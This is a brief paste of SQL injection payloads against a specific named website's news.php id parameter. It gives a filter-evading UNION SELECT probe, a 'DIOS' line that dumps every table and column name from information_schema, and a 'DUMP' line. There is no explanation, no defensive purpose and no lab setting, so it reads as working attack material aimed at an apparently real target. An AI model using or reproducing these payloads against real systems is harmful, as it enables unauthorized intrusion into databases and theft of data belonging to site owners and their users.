
Query http://www.sctech.org/news.php?id=265/**8**/and/**8**/mod(9,9)/**8**/+/*!50000UnIoN*//**8**//*!50000select*//**8**/1,2,3,4,5,6,7,8--+
DIOS : http://www.sctech.org/news.php?id=265/**8**/and/**8**/mod(9,9)/**8**/+/*!50000UnIoN*//**8**//*!50000select*//**8**/1,2,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),4,5,6,7,8--+
DUMP :: http://www.sctech.org/news.php?id=265/**8**/and/**8**/mod(9,9)/**8**/+/*!50000UnIoN*//**8**//*!50000select*//**8**/1,2,4,5,6,7,8--+
